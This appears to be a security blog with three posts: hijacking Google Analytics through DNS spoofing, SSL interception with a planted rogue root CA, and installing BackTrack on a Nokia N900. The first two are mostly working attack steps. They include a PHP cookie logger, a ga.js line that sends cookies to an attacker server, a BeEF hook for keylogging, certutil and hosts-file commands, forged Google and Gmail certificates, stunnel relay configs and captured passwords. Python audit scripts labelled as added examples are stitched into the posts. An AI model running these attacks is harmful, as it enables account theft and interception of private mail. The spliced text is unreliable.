SeventhOctober.net

sequel7's ramblings

Hijacking Google Analytics

The Rambling Intro

This is a fun one I came up with while looking at a site this week. I feel sure that somebody else must have come up with this before me, but I’ve never seen anyone blog about it or anything, so here goes.

The back story is that somebody posted a link to some “password strength checker” website, in which of course you type your password and it tells you how long it thinks it would take someone to crack it. Naturally, I find this to be a dumb idea, as you’re typing your password into some random website of some random guy you don’t know, and it didn’t even use SSL.

The site author explains that this isn’t a problem, because all the calculations are done in javascript, and no data is ever actually sent to his website. Alright, fine, even though the vast majority of users will never do this, I checked the code, and sure enough, no data goes to him, it’s all done in the browser. But… wait, he does use Google Analytics. Interesting.

Now the problem with the idea that it’s okay to type in a password on a website that doesn’t use SSL because it doesn’t ever send the data, is that the page can be manipulated. An attacker might change the form to actually submit the data somewhere, or he might inject javascript to actually record each key press and do the same, etc. The difficult part about pulling off an attack like that is that normally it means the attacker must have an actively maintained position as a man-in-the-middle for each target, replacing HTML content on the fly, and hoping he doesn’t noticeably break anything.

But what if there happened to be a standalone chunk of javascript already included on roughly half the websites people use in the world? What if we could hijack that chunk of javascript with a fair amount less effort than keeping ettercap in place 24/7?

The Requirements

Alright, to pull this off, we still need a few things already accomplished. The only tough part is getting control of the target’s DNS somehow. More specifically, we need to control the resolution of at least a single specific DNS record. There are dozens of ways to do this, including, but not limited to:

  • Actually being a man-in-the-middle, and using dnsspoof, ettercap, what have you.
  • Compromising the victim’s DNS server. Less likely if they’re using a major provider, but maybe you’re pen-testing an organization that runs one internally.
  • Adding a record to the victim’s hosts file. This obviously requires some access already, but it would give you some additional permanence on a box, and help escalate you past what you have access to without their web passwords. It’s also not likely to be noticed if the victim doesn’t have some kind of file integrity tripwire set up.
  • Changing the DNS server on a router. Easy to do on your average home wireless router run by the inept, and still possible if an organization hasn’t properly secured their routers.
  • Running a fake DHCP server, and handing out your DNS server’s address to clients. This can go along well with PwnPlugs, for example.

So once we can do that, we just need to get their browser to believe that “www.google-analytics.com”, aka “www-google-analytics.l.google.com”, is at an IP address where we have a web server running on port 80.

Interestingly, Google makes this easy for us, in that we don’t have to worry about SSL, or certificate errors. We probably don’t have a way to make our web server’s SSL certificate match the one for Google’s, but that’s okay. In the javascript included on web pages that use it, Google Analytics actually checks to see if the site is being accessed via SSL, and if so, it calls the Analytics code from an entirely different host name, ssl.google-analytics.com, rather than www.

This means that if the victim accesses a site using Google Analytics over SSL from the start, we don’t get access, but the user also doesn’t get alerted. However, if the site initially loads unencrypted, we can hijack things and replace any links to https with regular http links from then on out.
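From the site owner's side, the exposure described above is any script a page fetches over cleartext HTTP. The Python audit below is an added example, not part of the original post: it lists such scripts in a page's HTML, including the protocol-switching loader. The sample page, the example.test hostnames and the function names are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline loader that picks the script host from the page protocol, as the
# post describes: ssl.google-analytics.com on HTTPS pages, www. otherwise.
PROTOCOL_SWITCH = re.compile(
    r"""['"]https:['"]\s*===?\s*document\.location\.protocol""")
# Assumption: a matching loader is the Google Analytics one discussed here.
HTTP_LOADER_HOST = "www.google-analytics.com"


class ScriptAudit(HTMLParser):
    """Collect scripts that a page at page_url would fetch over cleartext."""

    def __init__(self, page_url):
        super().__init__()
        page = urlparse(page_url)
        self.page_scheme = page.scheme
        self.page_host = page.hostname
        self.findings = []      # (kind, host) tuples
        self._inline = None     # text chunks of the inline <script> being read

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src is None:
            self._inline = []
            return
        # Relative and protocol-relative URLs inherit the page's scheme.
        target = urlparse(src.strip(), scheme=self.page_scheme)
        if target.scheme == "http":
            self.findings.append(
                ("cleartext-script", target.hostname or self.page_host))

    def handle_data(self, data):
        if self._inline is not None:
            self._inline.append(data)

    def handle_endtag(self, tag):
        if tag != "script" or self._inline is None:
            return
        body, self._inline = "".join(self._inline), None
        # On an HTTP page the loader resolves to the plain-HTTP host.
        if self.page_scheme == "http" and PROTOCOL_SWITCH.search(body):
            self.findings.append(("protocol-switch-loader", HTTP_LOADER_HOST))


def audit_page(page_url, html):
    """Return (kind, host) findings for scripts loaded without TLS."""
    parser = ScriptAudit(page_url)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page; the inline loader mirrors the behaviour in the post.
SAMPLE_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="//cdn.example.test/lib.js"></script>
<script src="https://ssl.google-analytics.com/ga.js"></script>
<script type="text/javascript">
  var ga = document.createElement('script');
  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www')
           + '.google-analytics.com/ga.js';
  document.getElementsByTagName('head')[0].appendChild(ga);
</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for url in ("http://shop.example.test/", "https://shop.example.test/"):
        print(url, audit_page(url, SAMPLE_PAGE))
```

The same markup produces three findings when the page is served over HTTP and none over HTTPS, which is why serving the page itself over TLS from the first request closes this path.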

The Fake DNS Server

For this demonstration, I’m going to assume we have successfully changed the DNS server of our victim. Again, this isn’t strictly necessary, but it’s the method I’m going to discuss in this post. As always, there are a dozen ways to do even this step, but in this instance I’m going to use a modified version of a modified version of the fake DNS server in the ever glorious Metasploit.

The problem with the fake DNS server included in Metasploit is that it will respond to all DNS queries with a single IP address, with the exception of specified domains which it will resolve normally. We want to do the exact opposite: Resolve all queries normally, with the exception of a specified domain, which we will be hijacking. Fortunately, a modified version of the Metasploit DNS server has been posted here, and it will do just that. Unfortunately, it’s broken.

Since that module was posted years ago, a lot of things have changed in Metasploit, and the module doesn’t work quite right now. The good news is, it’s easy to fix. Download the file from his website from here, or my mirror from here. Once you have the module, put it into your “modules/auxiliary/server/” directory inside Metasploit. In my case, that makes it /opt/framework3/msf3/modules/auxiliary/server/mitm_fakedns.rb, but yours may be different, especially if you installed MSF after it hit version 4.

Now you can either try and fix it yourself so that Metasploit doesn’t complain about it being formatted wrong, or you can just download my patch for it and fix it.

curl http://www.seventhoctober.net/mitm_fakedns.rb.patch | patch mitm_fakedns.rb

Metasploit should now be able to load and work with the module. The module requires two options set, one for the legitimate DNS server to forward most requests to, and one for a file containing a list of regular expressions to tell the module which DNS responses to mess with. For the first, pick any DNS server you like. For the second, create a file like so, replacing 127.0.0.1 with your external IP address:

echo 127.0.0.1,www-google-analytics.l.google.com > /root/hosts_spoof

You may note that this is not exactly a record for www.google-analytics.com. This threw me off a little bit at first, until I realized that this module does not run the given regex against the DNS requests, but rather the DNS responses from the legitimate server. Since a request for www.google-analytics.com actually returns a canonical name of www-google-analytics.l.google.com, we must make that our expression to match and be modified.

Incidentally, the URL looks vaguely like it might be a load balanced response, but I was unable to get any other answers back in the short time that I was messing with it. Keep that in mind, and in case yours doesn’t work for some reason, check that this is the response you are getting. If anybody knows more about that, I’d be interested in hearing from you.

Next, start the DNS server module with something like the following:

msfcli auxiliary/server/mitm_fakedns filename=/root/hosts_spoof realdns=8.8.8.8 E

And check that it is working with a query like:

dig @127.0.0.1 www.google-analytics.com

If all went well, it should return your own IP address in the record.

The Evil JavaScript

At this point, you can run any old web server with any old villainous javascript, so long as the server runs on port 80, and the javascript is hosted at /ga.js. Just about every website that uses Google Analytics will happily execute your javascript in the context of the page that loads it. Have fun!

Being that this is both an explanatory and a demo post, let’s specifically discuss a couple methods of actually abusing this technique. Firstly, let’s do a simple cross site cookie stealer. Since our javascript is running on the pages of the victims, we have access to the cookies of any page it runs on. As it turns out, this includes sites like Twitter, and WordPress.

Assuming you have a web server that can run PHP, create a couple of files that look something like the following:

[root html]# cat xss.php
<?php
// Append one line per request: client address, user agent, referrer and the "cookie" parameter.
$xssLog = "xss.log";
$filehandler = fopen($xssLog, 'a') or die("Cannot open file.");
$writeString = $_SERVER["REMOTE_ADDR"] . " – " . $_SERVER["HTTP_USER_AGENT"] . " – Referrer: " . $_SERVER["HTTP_REFERER"] . " – Cookie: " . $_GET["cookie"] . "\n";
fwrite($filehandler, $writeString);
fclose($filehandler);
?>

[root html]# cat ga.js
new Image().src="http://YOUR_SERVER_ADDRESS/xss.php?cookie="+encodeURI(document.cookie);

Next you’ll want to create a file for stuff to be logged to, and make sure the web server can write to it. This command may vary, based on your web server, or you can just chmod it. This is probably a slightly safer approach though:

[root html]# touch xss.log
[root html]# chown apache:apache xss.log

Once these are up, any time a victim visits any web page that uses Google Analytics, you should automatically get a record of it along with their cookies.

[root html]# cat xss.log
12.120.184.8 – Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0.1) Gecko/20100101 Firefox/5.0.1 – Referrer: http://twitter.com/ – Cookie: k=10.25.435.167.1321234567890349; guest_id=v1%3A132061234567865685; original_referer=8bhz%2B%2ByebvgRkMMFCXx%2FCUOEvDoVeFTl; twid=u%3D412345908%7CTcf4XaVwruflsKyq5xgPpcA%2mwNw%3D; twll=l%3D1234616679; lang=en; js=1

Using Burp, or whatever your favorite tool is, you can use these cookies to become your victim on whatever website they browsed to.

The BeEF

Have you heard of BeEF? Now you have. Basically put, BeEF is a tool designed to help security people demonstrate exactly how serious these kinds of attacks can be. It acts as a web server, hosting a control panel for you, and some javascript for your victims. BeEF lets us get a little more… interactive.

BackTrack comes with BeEF installed, and it might actually work out of the box. Mine didn’t, and yours probably won’t, but I’m not helping you fix yours here if it’s broken. Come back when it’s working. :-)

Before we start BeEF, we need to make a couple changes to the config. On my system, the config file is located at “/pentest/web/beef/config.yaml”. Find and open that file. Find the http section, and replace the port and hook_file to look like so:

http:
    host: "0.0.0.0"
    port: "80"
    # if running behind a nat set the public ip address here
    #public: ""
    dns: "localhost"
    panel_path: "/ui/panel"
    hook_file: "/ga.js"
    hook_session_name: "BEEFHOOK"
    session_cookie_name: "BEEFSESSION"

Now start up BeEF…

[email protected]:/pentest/web/beef# ./beef
[15:14:23][*] Browser Exploitation Framework (BeEF)
[15:14:23] | Version 0.4.2.11-alpha
[15:14:23] | Website http://beefproject.com
[15:14:23] | Run 'beef -h' for basic help.
[15:14:23] |_ Run 'svn update' to update to the latest revision.
[15:14:25][*] BeEF is loading. Wait a few seconds...
[snip…]
[15:14:29][+] running on network interface: 127.0.1.1
[15:14:29] | Hook URL: http://127.0.1.1:80/ga.js
[15:14:29] |_ UI URL: http://127.0.1.1:80/ui/panel
[snip…]

As you hopefully noticed, you can find your control panel at http://127.0.1.1:80/ui/panel. I’ll leave you to figure out the default credentials, but you should probably change them anyway, in “beef/extensions/admin_ui/config.yaml”. Once you’re in, as soon as a victim has browsed to a site that uses Google Analytics, you should see them show up in your control panel.

Once a victim is in your control panel, you can browse through the commands tab to see all the nasty things you can do to them. Among such possibilities are:

  • Keylogging for everything typed on the page, including passwords.
  • Page redirection, including the ability to redirect using an iFrame, so as not to change the URL in the address bar.
  • Rickrolling. See previous.
  • Sending Java payloads to the client.
  • Making HTTP requests from the victim’s browser.
  • Stealing cookies associated with the page.
  • Making Skype calls.
  • Getting the current geographical location of the victim.
  • Determining if the victim is using Tor.
  • Determining if the victim is signed into social networks.
  • Running arbitrary raw javascript.

… and lots more. BeEF is fun, and it’s just one of the javascript exploit frameworks out there. Happy hunting!

Written by sequel7

November 6th, 2011 at 6:11 pm

Posted in Hacking

SSL MITM with an inserted CA and a DNS hijack

Alright, so it’s time for my bi-annual blog post. The topic of this post is nothing new or shocking or deeply hi tech, but it’s cool and fun. Although I hear the dangers of trusting a fake certificate authority and the horrors of DNS spoofing talked about all the time, I almost never hear anyone talk about real ways to actually abuse them. As it turns out, if you can combine the two, you can end up with some seriously nasty man-in-the-middle abilities. For the record, I am assuming for this post that you are using BackTrack 5. All of this should work on any machine with these tools, but BT5 is what I am testing on.

There has been a lot of talk lately about the problems with SSL, some theoretical, some practical. For example, a lot of browsers trust CAs like “TÜRKTRUST Elektronik Sertifika Hizmet Sağlayıcısı”. Who the heck is that, and why would I want to trust a certificate they signed? I bet you can’t tell me without the assistance of a search engine. Just as interestingly, and the topic of today, would you notice if someone had inserted a random certificate authority of their own on your machine? And what could they really do to you if they did?

The goal of this attack is to transparently sniff a target’s SSL traffic, without triggering an SSL error on their screen. If you can pull this off, you gain access to a lot of things. HTTP (bank, webmail, company user portal, etc), SMTP, IMAP, POP, RDP, IRC, other instant messengers, certain SSL based VPNs, etc. We trust a LOT of things to SSL, and all of it falls down if someone can convince a client machine that an arbitrary SSL certificate is valid.

So the basic assumption for this attack is that you have managed to get your own certificate authority installed on someone’s machine, and that you have a way of redirecting their traffic to a server you control. One of the simplest ways this might happen is that you have gotten a shell on their box using some other exploitation method (perhaps even sitting down with a thumbdrive), uploaded a certificate and run two commands to add the certificate to the store and an entry to the DNS hosts file.

C:\Users\sequel7\Desktop>certutil -addstore Root fakeca.der
C:\Users\sequel7\Desktop>echo 10.13.37.42 www.google.com mail.google.com imap.gmail.com www.gmail.com pop.gmail.com smtp.gmail.com >> c:\windows\system32\drivers\etc\hosts

Ta-da, so now all traffic to anything we care about at gmail.com will be redirected to our server, as well as www.google.com itself and mail.google.com, so that we can sniff webmail. A better way to do the redirection would be to set up our own fake DNS server, and set that as the primary DNS server on the target, with a normal DNS server as the secondary. This way, we only need access to the target once, and from then on we can change which server we are hijacking at will. Once the attack is finished, we shut down our server and move on, and it may be some time before anyone notices that the primary DNS server is illegitimate. You could do the same if you’ve got access to the target’s router (linksys/admin anyone?). But for now, the hosts file works fine.
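A hosts-file entry is one of the redirection methods listed in the Google Analytics post and is the one used in the command above, so it is worth auditing for on any host. The Python check below is an added example, not the author's code; the watched domain list and the sample file are constructed from the names used in these posts.

```python
import ipaddress

# Public names these posts redirect; extend with your own critical services.
WATCHED_SUFFIXES = ("google-analytics.com", "google.com", "gmail.com")
# Names that normally live in a hosts file and are not worth reporting.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost",
               "ip6-loopback", "broadcasthost"}


def parse_hosts(text):
    """Yield (line_no, ip, names) for every well-formed mapping line."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # drop comments, split on blanks
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                             # not an address, ignore line
        yield line_no, ip, [n.lower().rstrip(".") for n in fields[1:]]


def is_watched(name, suffixes):
    return any(name == s or name.endswith("." + s) for s in suffixes)


def audit_hosts(text, watched=WATCHED_SUFFIXES):
    """Return (line_no, name, ip, kind) findings.

    redirect: a watched public name pinned to a routable address
    sinkhole: a watched name pinned to loopback/0.0.0.0 (typical ad blocking,
              only a concern if something listens locally)
    unlisted: any other static mapping, for manual review
    """
    findings = []
    for line_no, ip, names in parse_hosts(text):
        local = ip.is_loopback or ip.is_unspecified
        for name in names:
            if name in LOCAL_NAMES:
                continue
            if is_watched(name, watched):
                kind = "sinkhole" if local else "redirect"
            elif not local:
                kind = "unlisted"
            else:
                continue
            findings.append((line_no, name, str(ip), kind))
    return findings


# Constructed sample; the last line is the entry appended in the post.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost ip6-localhost
# ad blocking
0.0.0.0         www.google-analytics.com
192.168.1.20    nas.home.example   # local NAS
10.13.37.42 www.google.com mail.google.com imap.gmail.com www.gmail.com pop.gmail.com smtp.gmail.com
"""

if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```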

A couple of things to note: Certutil.exe seems to come by default on Vista/Seven machines, but not XP. I haven’t tested this thoroughly, so I could be wrong. Either way, you should be able to upload it on machines that are missing it, or if you feel like figuring it out you can use VB.NET or PowerShell. Also, this does not add your CA to Mozilla’s database, so you will have to find Mozilla’s own version of certutil (which is indeed out there) if you plan to hijack Firefox and Thunderbird. Of course, if you happen to be sitting at the victim’s machine (your boss left his screen unlocked again?), you can just click on stuff.

So having established how to get the CA cert on the victim, how do we create it to begin with? Easy stuff. I’m going to use AOL as an example here, because it’s fun to pick on them, and I don’t have to scroll down to find their certificates. VeriSign might be a more interesting one to pick for practical purposes though. Who’s going to question VeriSign? Also, note that I will only be making any of these certificates valid for 10 days. I’m assuming you will be using this guide for legitimate penetration testing, and so if you forget to clean up after yourself, this will prevent someone else from stealing your keys and using your already inserted rogue CAs against your client.

[email protected]:~/fakeca# openssl req -new -x509 -extensions v3_ca -keyout fakeca.key -out fakeca.crt -days 10 -nodes
Generating a 1024 bit RSA private key
..........++++++
..........++++++
writing new private key to 'fakeca.key'
-----
[snip]
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:.
Locality Name (eg, city) []:.
Organization Name (eg, company) [Internet Widgits Pty Ltd]:America Online Inc.
Organizational Unit Name (eg, section) []:.
Common Name (eg, YOUR name) []:America Online Root Certification Authority 42
Email Address []:

Then we convert the cert to DER format so that Windows is happy…

[email protected]:~/fakeca# openssl x509 -in fakeca.crt -outform DER -out fakeca.der

Then we copy the cert and the key into a single file for convenience sake…

[email protected]:~/fakeca# cat fakeca.crt fakeca.key > fakeca.pem

And now we have our certificate authority. The fakeca.der is the file that you need to copy to your target box and con into trusting.
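A root added this way stands out when the installed root store is compared against a known-good baseline. The Python check below is an added example, not from the original post; the record format, the fingerprint values and the thresholds are constructed assumptions, and real records would come from an export of the machine's root store.

```python
from datetime import datetime, timedelta
from difflib import SequenceMatcher


def audit_roots(installed, baseline, min_key_bits=2048,
                min_lifetime_days=365, lookalike_ratio=0.9):
    """Return (common_name, reasons) for every root absent from the baseline.

    Roots are matched by SHA-256 fingerprint, never by name, so a root that
    borrows a trusted CA's name is still reported.
    """
    trusted_fps = {r["sha256"] for r in baseline}
    trusted_names = [r["cn"] for r in baseline]
    findings = []
    for root in installed:
        if root["sha256"] in trusted_fps:
            continue
        reasons = ["not in baseline"]
        # A name nearly identical to a trusted root suggests impersonation.
        twin = next(
            (n for n in trusted_names
             if SequenceMatcher(None, root["cn"].lower(),
                                n.lower()).ratio() >= lookalike_ratio),
            None)
        if twin:
            reasons.append(f"name resembles baseline root {twin!r}")
        lifetime = (root["not_after"] - root["not_before"]).days
        if lifetime < min_lifetime_days:
            reasons.append(f"lifetime of {lifetime} days")
        if root["key_bits"] < min_key_bits:
            reasons.append(f"{root['key_bits']}-bit key")
        findings.append((root["cn"], reasons))
    return findings


def record(cn, fingerprint, issued, days, bits):
    """Build one root record (hypothetical format for this example)."""
    return {"cn": cn, "sha256": fingerprint, "key_bits": bits,
            "not_before": issued, "not_after": issued + timedelta(days=days)}


# Constructed data: fingerprints are placeholders, not real certificate hashes.
BASELINE = [
    record("America Online Root Certification Authority 1", "a1" * 32,
           datetime(2002, 5, 28), 9000, 2048),
    record("VeriSign Class 3 Public Primary Certification Authority - G5",
           "b2" * 32, datetime(2006, 11, 8), 10000, 2048),
]
INSTALLED = BASELINE + [
    # Mirrors the CA built above: 1024-bit key, 10-day validity, AOL-like name.
    record("America Online Root Certification Authority 42", "c3" * 32,
           datetime(2011, 8, 14), 10, 1024),
    # An unrelated internal root: reported once, then added to the baseline.
    record("Corp Internal Root CA", "d4" * 32,
           datetime(2010, 1, 1), 3650, 4096),
]

if __name__ == "__main__":
    for name, reasons in audit_roots(INSTALLED, BASELINE):
        print(name, "->", "; ".join(reasons))
```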

Now we need to go about using that CA to create certificates for our fake server. Remember, if we own the target’s DNS, since we’ve gotten them to trust our CA, we can switch targets as often as we want by simply generating a new server certificate and changing which address our evil DNS server is lying about. Today we are targeting Gmail, but really this will work for nearly anything. First we generate the key and certificate signing request.

[email protected]:~/fakeca# openssl req -new -nodes -keyout fakegmail.key -out fakegmail.csr -days 10
Generating a 1024 bit RSA private key
..........++++++
..........++++++
writing new private key to 'fakegmail.key'
-----
[snip]
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:California
Locality Name (eg, city) []:Mountain View
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Google Inc
Organizational Unit Name (eg, section) []:.
Common Name (eg, YOUR name) []:*.gmail.com
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Specifically note the wildcard common name. This allows us to hijack imap.gmail.com, pop.gmail.com, and smtp.gmail.com all at once. We will need to generate another certificate in a moment for *.google.com, so as to steal webmail. First, we need to use our fake CA to sign the fake Gmail key.

[email protected]:~/fakeca# openssl x509 -CA fakeca.pem -set_serial 1 -req -in fakegmail.csr -days 10 -out fakegmail.crt
Signature ok
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=*.gmail.com
Getting CA Private Key

And once again combine the certificate and the key into a single file for convenience sake.

[email protected]:~/fakeca# cat fakegmail.crt fakegmail.key > fakegmail.pem

And now let’s repeat the whole process and get a certificate for *.google.com.

[email protected]:~/fakeca# openssl req -new -nodes -keyout fakegoogle.key -out fakegoogle.csr -days 10
Generating a 1024 bit RSA private key
..........++++++
..........++++++
writing new private key to 'fakegoogle.key'
-----
[snip]
-----
Country Name (2 letter code) [AU]:US
State or Province Name (full name) [Some-State]:California
Locality Name (eg, city) []:Mountain View
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Google Inc
Organizational Unit Name (eg, section) []:.
Common Name (eg, YOUR name) []:*.google.com
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
[email protected]:~/fakeca#
[email protected]:~/fakeca# openssl x509 -CA fakeca.pem -set_serial 1 -req -in fakegoogle.csr -days 10 -out fakegoogle.crt
Signature ok
subject=/C=US/ST=California/L=Mountain View/O=Google Inc/CN=*.google.com
Getting CA Private Key
[email protected]:~/fakeca#
[email protected]:~/fakeca# cat fakegoogle.crt fakegoogle.key > fakegoogle.pem

Alright so now we have our fake certificate authority, our fake gmail.com certificate, and our fake google.com certificate. How do we actually do the man-in-the-middle part? Well, I tried a few ways of doing this, some work and some don’t, but I think the easiest way of doing the non-HTTP services is to just use Stunnel.

Stunnel, in short, is designed to work as an SSL conversion proxy. It either takes SSL in and proxies it out as plain text, or takes in plain text and proxies it out as SSL. So we could just set it to accept SSL on our evil server and proxy it as plain text to the real server… but I would rather not be giving out my target’s plain text to anybody but me and the intended server. Again, I’m assuming your purpose is a legitimate penetration test, so we can’t be downgrading our client’s security under the excuse of testing them. Or, if you’re a black hat, maybe you just don’t want anyone else stealing your ill-gotten passwords. So since Stunnel only supports converting SSL to plain or plain to SSL, what to do?

Why, we run Stunnel twice, of course! If we run Stunnel in SSL server mode, using our fake certificate, our target will connect to us, and Stunnel will decrypt all the communications. If we then run Stunnel in SSL client mode as well, and have the Stunnel server dump the decrypted communications into the Stunnel client, we can have the Stunnel client then re-encrypt it all and ferry it out to the legitimate server, who will be none the wiser as we happily listen in on everything.

Since SSL encryption requires the use of static IP addresses (for reasons you should probably understand before attempting this all), we can easily use nslookup or whatever you prefer to find the IP addresses for Stunnel to ferry data to. As I have already done that, here are example configuration files for both the Stunnel server and client.

stunnel-server.conf:

; make sure that "cert" is set to the .pem file for your fake server certificate (signed by your fake CA)
cert = /root/fakeca/fakegmail.pem
; note, sslVersion must be set to "all" in order
; to hijack sessions that use TLS, such as imap
sslVersion = all
chroot = /usr/local/var/lib/stunnel/
setuid = nobody
setgid = nogroup
pid = /stunnel.pid
socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1

[pop3s]
accept = 995
connect = 127.0.0.1:110

[imaps]
accept = 993
connect = 127.0.0.1:143

[ssmtp]
accept = 465
connect = 127.0.0.1:25

[ssmtp2]
accept = 587
connect = 127.0.0.1:25

stunnel-client.conf:

sslVersion = SSLv3
chroot = /usr/local/var/lib/stunnel/
setuid = nobody
setgid = nogroup
pid = /stunnel.pid
socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1
; SSL client mode
client = yes

[pop3s]
accept = 110
connect = 74.125.67.109:995

[imaps]
accept = 143
connect = 74.125.47.109:993

[ssmtp]
accept = 25
connect = 74.125.159.109:465

And now run Stunnel and check to make sure it started properly.

[email protected]:~/fakeca# stunnel stunnel-server.conf
[email protected]:~/fakeca# stunnel stunnel-client.conf
[email protected]:~#
[email protected]:~/fakeca# lsof -i -P -n|grep stunnel
stunnel 4954 nobody 11u IPv4 46410 0t0 TCP *:995 (LISTEN)
stunnel 4954 nobody 12u IPv4 46411 0t0 TCP *:993 (LISTEN)
stunnel 4954 nobody 13u IPv4 46412 0t0 TCP *:465 (LISTEN)
stunnel 4954 nobody 14u IPv4 46413 0t0 TCP *:587 (LISTEN)
stunnel 4968 nobody 11u IPv4 46455 0t0 TCP *:110 (LISTEN)
stunnel 4968 nobody 12u IPv4 46456 0t0 TCP *:143 (LISTEN)
stunnel 4968 nobody 13u IPv4 46457 0t0 TCP *:25 (LISTEN)

Now, how do we actually see what it sniffs? Easily enough, since all of the plaintext will be going right over our own local interface. We can use Wireshark, dsniff, ettercap in sniff only mode, whatever happens to be your favorite tool to sniff things. And we don’t have to limit ourselves to sniffing passwords either, we can sniff the entirety of every email conversation too, should you choose to use one of those tools. As one example:

[email protected]:~# tshark -n -i lo -R imap
Running as user "root" and group "root". This could be dangerous.
Capturing on lo
0.000000 127.0.0.1 -> 127.0.0.1 IMAP 106 Request: yx5k LOGIN “[email protected]” “passw0rd

Okay great, so that’s now going to happily intercept IMAP, POP3, and SMTP. But what about HTTP? For the most part, you could actually just grab HTTP and HTTPS exactly the same way, by adding ports 80 and 443 into the example Stunnel configurations. But HTTP can actually be a bit more picky sometimes about which virtual host it asked for, and which IP it ended up at, etc. Because of this, rather than just straight up forwarding the sessions with Stunnel, I ended up using webmitm, part of the dsniff suite of tools.

Webmitm, believe it or not, is a web man in the middle tool. It actually works quite well for what it does, though I find it lacking a little in flexibility. Webmitm needs to use the file “webmitm.crt” from whatever directory you start it in, and it will listen on ports 80 and 443 or die. Also, it cannot output logs to a file by itself, and redirecting stdout and stderr seems to have no effect. A workaround for this problem is to stick it in nohup, and just tail -f nohup.out. You could also use sslstrip or ssldump along with webmitm, or squid instead of webmitm, but this way seems easiest and least likely to give you a headache.

So to use webmitm, first copy your google.com certificate to webmitm.crt.

[email protected]:~/fakeca# cp fakegoogle.pem webmitm.crt

Then start webmitm using nohup and two -d flags. One -d only shows basic information, two -d’s will show you all HTTP POSTs, and three -d’s will give you the entire HTTP session. You can use three if you want, it’s your time, eyeballs, and disk space.

[email protected]:~/fakeca# nohup webmitm -dd &
[1] 31337
[email protected]:~/fakeca# nohup: ignoring input and appending output to `nohup.out’
[email protected]:~/fakeca# tail -f nohup.out
webmitm: relaying transparently
[snip]
charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0
%84&lsd=aBIeX&locale=en_US&email=bob&pass=passw0rd
&default_persistent=0&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=aBIeX

Imagine if you got domain admin on a network and pulled off this trick. You could push out the fake CA and change the DNS settings for an entire enterprise, and sniff every email, instant message, RDP session, and password for every employee in the entire company, completely without SSL warnings.

That’s about it. I hope I’ve explained this well, I hope it helps someone (ideally someone with good intent), and I apologize for my long winded rambling. If you have any comments, questions, insults, suggestions, or corrections, please feel free to leave them in the comment box. Take care!

Written by sequel7

August 14th, 2011 at 6:02 pm

Posted in Hacking,IT Security

BackTrack 5 on Nokia N900

BackTrack 5 is awesome. The N900 is (once again) awesome. Now they can be awesome together. Here’s how…

Before I start, lemme give credit where credit is due. The BackTrack and OffSec teams are also awesome. The script I’m using came straight out of their BT5 ARM image, with just a few adjustments to work on the N900. You can and should download BackTrack here – http://www.backtrack-linux.org/downloads/

Furthermore, the guys at http://talk.maemo.org/showthread.php?t=72933 had this working days before I did. My method is only slightly different than theirs, but I like mine better because it uses the script straight from the image. I’m also going to mention a couple things they didn’t.

On to the instructions…

  1. You must have rooted your N900. If you don’t know how to root your N900, this post is not for you.
  2. You must be running the power users kernel. Since I wanted to do this install with a clean flash of my N900, I spent a fair chunk of three days trying to figure out how to solve the “exec format error” problem. It turns out that this kernel fixes it easy. Just run `apt-get install kernel-power*`, and all will be well.
  3. You must have space to put the BT5 image, and it must be on a file system that allows for large files. The default file system on your memory card won’t cut it. I chose to reformat my memory card’s partition into ext3, but you can do whatever you like.
    • The easiest way to do this is `mkfs.ext3 <partition name>`. Beware, this will wipe the partition, so make sure there’s nothing important on it, and make sure you’re wiping the right one. It’s probably /dev/mmcblk1p1.
    • Then you’ll want to mount that partition somewhere. I chose to mount it in /media. To do this, `mkdir /media/mmc1; mount /dev/mmcblk1p1 /media/mmc1`. You may want to see the next list item first though.
  4. Now you’ll need to copy the bt5.img file into /media/mmc1 somehow or other. I chose to copy it over USB by mounting the media card in my Linux laptop, as I’ve found that wirelessly transferring large files on my N900 is iffy at best. Note, you won’t be able to mount the card on your laptop while it’s mounted in Maemo on your N900. Also note, check the frigging md5sum if you don’t want to bang your head on the wall a lot.
  5. In the same directory as the bt5.img file, you’ll want to have the bootbt script. I’ve slightly modified it to work in our situation, instead of Android. Rather than fight with WordPress’ formatting, I’ll just link you to it. http://pastie.org/1907031
  6. If your locations or partition are any different, you may need to edit that script. Basically it is set up to create /media/mmc1/bt5mnt if it doesn’t exist, and then mount ./bt5.img on it. I suppose it could probably be changed to create ./bt5mnt instead, but I already pasted the script, so that’s your problem.
  7. Run the script. `bash ./bootbt`, or `chmod +x ./bootbt; ./bootbt`, or whatever. I don’t care. If neither of us forgot anything, it should chroot you right on into BT5, and you’ll get the red prompt text.  If you want to just run command line stuff, you’re done!
  8. Next up is if you want to run VNC. Which you do, obviously, if only to get that awesome dragon wallpaper on your N900. You’ll want to edit /usr/bin/startvnc and change the geometry to 800x480. I prefer using nano to do this, but apparently I’m not as leet as the vi cultists, who can bite me.
  9. Change your vnc password using `vncpasswd`.
